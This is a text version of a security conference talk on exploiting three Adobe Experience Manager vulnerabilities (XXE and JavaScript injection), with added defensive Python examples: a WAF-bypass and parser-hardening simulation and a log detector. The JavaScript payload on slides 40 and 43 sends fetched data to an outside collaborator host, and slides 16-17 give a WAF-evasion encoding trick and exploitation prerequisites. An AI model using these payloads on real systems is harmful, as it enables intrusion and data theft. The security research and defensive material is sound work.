Slide 1

EUROPE'S LEADING AEM DEVELOPER CONFERENCE, 28th – 30th SEPTEMBER 2020
A Hacker's perspective on AEM applications security
Mikhail Egorov, Security researcher & bug hunter

Slide 2

Intro

Slide 3

whoami
▪ Security researcher & full-time bug hunter
  ▪ https://bugcrowd.com/0ang3el
  ▪ https://hackerone.com/0ang3el
▪ Conference speaker
  ▪ https://www.slideshare.net/0ang3el
  ▪ https://speakerdeck.com/0ang3el

Slide 4

whoami
▪ Toolset for AEM hacking
  ▪ https://github.com/0ang3el/aem-hacker

Slide 5

APSB19-48

Slide 6

APSB19-48
▪ http://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
▪ CVE-2019-8086 / XML eXternal Entity Injection
▪ CVE-2019-8087 / XML eXternal Entity Injection
▪ CVE-2019-8088 / JavaScript Code Injection

Slide 7

XML eXternal Entity (XXE) attacks
▪ Do we see the parsed XML?
▪ What's allowed by the XML parser?
  ▪ General external entities
  ▪ Parameter external entities
  ▪ External DTD loading

Slide 8

XML eXternal Entity (XXE) attacks
▪ Payload fragment: ]> &xxe;
▪ Result:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
…

Slide 9

XML eXternal Entity (XXE) attacks
▪ Payload fragment (parameter entity): %xxe; ]>

Slide 10

XML eXternal Entity (XXE) attacks
(image-only slide)

Slide 11

CVE-2019-8086
▪ GuideInternalSubmitServlet

    @Service({Servlet.class})
    @Properties({
        @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
        @Property(name = "sling.servlet.methods", value = {"POST"}),
        @Property(name = "sling.servlet.selectors", value = {"af.internalsubmit"})
    })
    public class GuideInternalSubmitServlet …

Slide 12

CVE-2019-8086
(image-only slide)

Slide 13

CVE-2019-8086
(image-only slide)

Slide 14

CVE-2019-8086
▪ XXE payload (fragment): ]> &a;

Slide 15

CVE-2019-8086
(image-only slide)

Slide 16

CVE-2019-8086
▪ Exploitation hints
  ▪ We can JSON-encode XXE payload to bypass a WAF
  ▪ In Java we can list directory content
    ▪ /proc/self/cwd

Slide 17

CVE-2019-8086
▪ JSON-encoding

    # XXE payload string as shown on the slide (the XML markup is truncated there)
    data = ']>&a;'
    result = ""
    for c in data:
        # escape every character as \u00XX so a WAF sees no XML markup in the raw body
        result = result + "\\u00%02x" % ord(c)
    print(result)
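Added example, not code from the talk: a Python simulation of both sides of the JSON-encoding trick from slides 16 and 17, written from the defender's side. naive_waf_blocks() stands in for a WAF rule that pattern-matches the raw request body; inspect_request() stands in for the servlet, which JSON-decodes the body first and only then parses the XML. parse_strict() shows the parser configuration that slide 7 asks about: it refuses every DOCTYPE, entity declaration and external entity reference, so general external entities, parameter external entities and external DTD loading are all disallowed regardless of how the body was encoded on the wire. The function names, the JSON field "data" and the sample documents are all constructed for this example.

```python
import json
import xml.parsers.expat

# Constructed sample documents. XXE_XML declares an external entity the way the
# slides' payload does; SAFE_XML is an ordinary document without a DOCTYPE.
XXE_XML = ('<?xml version="1.0"?>'
           '<!DOCTYPE r [<!ENTITY a SYSTEM "file:///etc/passwd">]>'
           '<r>&a;</r>')
SAFE_XML = '<?xml version="1.0"?><r>hello</r>'


def json_unicode_escape(data: str) -> str:
    """Escape every character as \\u00XX, as the slide-17 snippet does (ASCII input assumed)."""
    return ''.join('\\u00%02x' % ord(c) for c in data)


def build_body(xml_text: str, encoded: bool) -> str:
    """Build the JSON request body {"data": <xml>} either plainly or fully \\u-escaped."""
    if encoded:
        return '{"data": "' + json_unicode_escape(xml_text) + '"}'
    return json.dumps({"data": xml_text})


def decode_body(raw_body: str) -> str:
    """What the servlet sees after JSON decoding: the original XML text."""
    return json.loads(raw_body)["data"]


def naive_waf_blocks(raw_body: str) -> bool:
    """A pattern check on the raw body, as a WAF rule without JSON-aware decoding would do it."""
    return '<!DOCTYPE' in raw_body or '<!ENTITY' in raw_body


class DoctypeRejected(ValueError):
    """Raised when the document tries to declare a DOCTYPE or any entity."""


def parse_strict(xml_text: str) -> str:
    """Parse with expat but refuse DOCTYPE declarations, entity declarations and
    external entity references. Returns the root element name on success."""
    parser = xml.parsers.expat.ParserCreate()
    root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected('DOCTYPE not allowed (name=%r, system id=%r)' % (name, sysid))

    def on_entity_decl(name, is_pe, value, base, sysid, pubid, notation):
        raise DoctypeRejected('entity declaration not allowed: %r' % name)

    def on_ext_entity_ref(context, base, sysid, pubid):
        raise DoctypeRejected('external entity reference blocked: %r' % sysid)

    def on_start(name, attrs):
        if not root:
            root.append(name)

    # Exceptions raised inside expat handlers propagate out of Parse().
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_ext_entity_ref
    parser.StartElementHandler = on_start
    parser.Parse(xml_text, True)
    return root[0]


def inspect_request(raw_body: str) -> dict:
    """Report whether the raw-body WAF check fired and whether the strict parser accepted the XML."""
    blocked = naive_waf_blocks(raw_body)
    try:
        parse_strict(decode_body(raw_body))
        return {"waf_blocked": blocked, "parser_accepted": True}
    except DoctypeRejected:
        return {"waf_blocked": blocked, "parser_accepted": False}


if __name__ == "__main__":
    for label, body in (("plain XXE", build_body(XXE_XML, False)),
                        ("escaped XXE", build_body(XXE_XML, True)),
                        ("benign", build_body(SAFE_XML, False))):
        print(label, inspect_request(body))
```

Running it shows the point of the slide: the plain payload is caught by the raw-body pattern check, the \u-escaped payload slips past it, and only the parser configuration stops both. Hardening the parser (the equivalent in Java being to disallow DOCTYPE and external entities on the DocumentBuilderFactory or SAXParserFactory) is therefore the control to rely on; a WAF signature is a secondary layer.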

Slide 18

CVE-2019-8086
(image-only slide)

Slide 19

CVE-2019-8086
▪ XXE payload (fragment): ]> &a;

Slide 20

CVE-2019-8086
(image-only slide)

Slide 21

CVE-2019-8086
▪ Exploitation requirements
  ▪ There should be a node with fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
  ▪ Attacker should have a jcr:write access somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

Slide 22

CVE-2019-8086
▪ Exploitation requirements
  ▪ Doesn't work equally on different AEM versions
  ▪ Only blind SSRF for some versions

Slide 23

CVE-2019-8087
▪ WSDLInvokerServlet

    @Service({Servlet.class})
    @Properties({
        @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
        @Property(name = "sling.servlet.selectors", value = {"af.wsdl"}),
        @Property(name = "sling.servlet.methods", value = {"POST"})
    })
    public class WSDLInvokerServlet …

Slide 24

CVE-2019-8087
(image-only slide)

Slide 25

CVE-2019-8087
(image-only slide)

Slide 26

CVE-2019-8087
▪ WSDL example
  ▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html

Slide 27

CVE-2019-8087
(image-only slide)

Slide 28

CVE-2019-8087
▪ Malicious xxe.wsdl (fragment): %dtd; %param1; ]> …

Slide 29

CVE-2019-8087
▪ Malicious loot.dtd (fragment): ">

Slide 30

CVE-2019-8087
(image-only slide)

Slide 31

CVE-2019-8087
▪ Exploitation requirements
  ▪ There should be a node with fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
  ▪ Attacker should have a jcr:write access somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

Slide 32

CVE-2019-8087
▪ Exploitation requirements
  ▪ Doesn't work equally on different AEM versions
  ▪ On some AEM versions WSDLInvokerServlet is not present

Slide 33

CVE-2019-8088
▪ GuideSubmitServlet

    @Service({Servlet.class})
    @Properties({
        @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
        @Property(name = "sling.servlet.methods", value = {"POST"}),
        @Property(name = "sling.servlet.selectors", value = {"af.submit", "af.agreement", "af.signSubmit"})
    })
    public class GuideSubmitServlet extends SlingAllMethodsServlet { …
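Added example, not part of the talk: a log-side detector for requests that would be dispatched to the three servlets from slides 11, 23 and 33, keyed on the selector strings in their annotations. The log lines are constructed Apache combined-format entries of the kind a dispatcher in front of AEM writes; the addresses and paths are made up. sling_decompose() is a simplified version of Sling's URL decomposition written for this example (it assumes the first dot in the path starts the selector/extension part), not Sling's own code. Because Sling resolves a servlet on the longest matching selector prefix, the match is done on the selector list as a prefix, so trailing extra selectors do not hide a request.

```python
import re
from collections import Counter

# Selector strings registered by the three AEM Forms servlets named on the slides.
WATCHED_SELECTORS = {
    "af.internalsubmit": "GuideInternalSubmitServlet",
    "af.wsdl": "WSDLInvokerServlet",
    "af.submit": "GuideSubmitServlet",
    "af.agreement": "GuideSubmitServlet",
    "af.signSubmit": "GuideSubmitServlet",
}

# Constructed sample log (Apache combined format, as a dispatcher would write it).
SAMPLE_LOG = """\
203.0.113.7 - - [28/Sep/2020:10:01:12 +0000] "POST /content/forms/af/demo.af.internalsubmit.json HTTP/1.1" 200 311
203.0.113.7 - - [28/Sep/2020:10:01:15 +0000] "POST /content/usergenerated/etc/commerce/smartlists/x.af.wsdl.html HTTP/1.1" 500 88
198.51.100.2 - - [28/Sep/2020:10:02:01 +0000] "GET /content/forms/af/demo.html HTTP/1.1" 200 4096
198.51.100.2 - - [28/Sep/2020:10:02:40 +0000] "POST /content/forms/af/demo.af.submit.jsp/suffix HTTP/1.1" 200 120
203.0.113.7 - - [28/Sep/2020:10:03:05 +0000] "POST /content/forms/af/demo.af.submit.json?wcmmode=disabled HTTP/1.1" 200 120
198.51.100.2 - - [28/Sep/2020:10:03:30 +0000] "POST /content/forms/af/demo.af.internalsubmit.extra.json HTTP/1.1" 200 311
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')


def sling_decompose(target: str):
    """Return (resource path, selector string, extension, suffix) for a request target.
    Simplified: the first '.' in the path starts selectors/extension, the first '/'
    after it starts the suffix. Directory names containing dots are not handled."""
    path = target.split('?', 1)[0]
    dot = path.find('.')
    if dot == -1:
        return path, '', '', ''
    slash = path.find('/', dot)
    head, suffix = (path, '') if slash == -1 else (path[:slash], path[slash:])
    parts = head[dot + 1:].split('.')
    return path[:dot], '.'.join(parts[:-1]), parts[-1], suffix


def matched_servlet(selector_string: str):
    """Name the watched servlet whose selectors are a prefix of the request's selectors."""
    sels = selector_string.split('.') if selector_string else []
    for watched, servlet in WATCHED_SELECTORS.items():
        wanted = watched.split('.')
        if sels[:len(wanted)] == wanted:
            return servlet
    return None


def scan_log(text: str):
    """List (ip, resource path, servlet, status) for POSTs routed to a watched servlet."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m['method'] != 'POST':
            continue
        path, selectors, _ext, _suffix = sling_decompose(m['target'])
        servlet = matched_servlet(selectors)
        if servlet:
            hits.append((m['ip'], path, servlet, int(m['status'])))
    return hits


def hits_per_source(hits):
    """Count hits per client address, a quick way to spot one source probing all three servlets."""
    return Counter(ip for ip, *_ in hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(hits_per_source(found))
```

On a real instance these requests are legitimate when they come from the adaptive forms that actually use guideContainer; what is worth alerting on is the same client hitting several of the selectors in a short window, hits under /content/usergenerated (slides 21, 31 and 46 name it as the writable location), and POSTs to guideContainer resources that are not known form pages.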

Slide 34

CVE-2019-8088
(image-only slide)

Slide 35

CVE-2019-8088
(image-only slide)

Slide 36

CVE-2019-8088
(image-only slide)

Slide 37

CVE-2019-8088
(image-only slide)

Slide 38

CVE-2019-8088
(image-only slide)

Slide 39

CVE-2019-8088
▪ Sandboxed Rhino engine on some AEM versions
  ▪ No RCE
  ▪ Sandbox allows network interactions
    ▪ SSRF w/ ability to see the response

Slide 40

CVE-2019-8088
▪ JS payload

    ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net');//

Slide 41

CVE-2019-8088
(image-only slide)

Slide 42

CVE-2019-8088
(image-only slide)

Slide 43

CVE-2019-8088
▪ JS payload

    ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net',function(data){jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net',{loot:data})});//

Slide 44

CVE-2019-8088
(image-only slide)

Slide 45

CVE-2019-8088
(image-only slide)

Slide 46

CVE-2019-8088
▪ Exploitation requirements
  ▪ There should be a node with fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
  ▪ Attacker should have a jcr:write access somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

Slide 47

CVE-2019-8088
▪ Exploitation requirements
  ▪ Doesn't work equally on different AEM versions
  ▪ RCE or SSRF

Slide 48

APSB19-48
▪ Keep AEM up to date
  ▪ http://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
▪ Block jcr:write access for anonymous user
  ▪ /content/usergenerated/etc/commerce/smartlists/
▪ Remove demo content (Geometrixx, WeRetail, …)

Slide 49

Thank you
@0ang3el